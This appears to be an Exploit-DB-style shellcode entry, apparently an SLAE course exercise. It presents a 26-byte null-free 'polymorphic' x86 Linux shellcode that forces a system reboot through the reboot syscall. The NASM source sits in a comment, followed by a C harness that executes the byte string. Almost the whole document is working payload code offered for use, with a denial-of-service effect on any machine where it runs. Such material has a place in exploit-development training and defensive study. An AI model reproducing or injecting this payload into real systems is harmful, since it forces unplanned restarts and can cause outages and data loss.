# Exploit Title: Linux\x86 - 'reboot' polymorphic Shellcode (26 bytes)
# Purpose: This is a x86 Linux null-free polymorphic shellcode for forcing a reboot.
# Date: 2020-03-23
# Author: Upayan a.k.a. slaeryan
# Contact: upayansaha@icloud.com
# SLAE: 1525
# Vendor Homepage: None
# Software Link: None
# Tested on: Linux x86
# CVE: N/A
/*
; Filename: reboot_polymorphic.nasm
; Author: Upayan a.k.a. slaeryan
; SLAE: 1525
; Contact: upayansaha@icloud.com
; Purpose: This is a x86 Linux null-free polymorphic shellcode for forcing a reboot.
; Testing: ./reboot_polymorphic
; Compile with: ./compile.sh reboot_polymorphic
; Size of shellcode: 26 bytes
global _start
section .text
_start:
xor eax, eax ; Clearing the EAX register
xor ebx, ebx ; Clearing the EBX register
xor ecx, ecx ; Clearing the ECX register
cdq ; Clearing the EDX register
mov al, 0x58 ; Loading syscall value = 0x58 for reboot in AL
mov ebx, 0xfee1dead ; Loading magic 1 in EBX
mov ecx, 672274793 ; Loading magic 2 in ECX
mov edx, 0x1234567 ; Loading cmd val = LINUX_REBOOT_CMD_RESTART in EDX
int 0x80 ; Executing the reboot syscall
*/
#include <stdio.h>
#include <string.h>
unsigned char code[] = \
"\x31\xc0\x31\xdb\x31\xc9\x99\xb0\x58\xbb\xad\xde\xe1\xfe\xb9\x69\x19\x12\x28\xba\x67\x45\x23\x01\xcd\x80";
void main()
{
printf("Shellcode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}
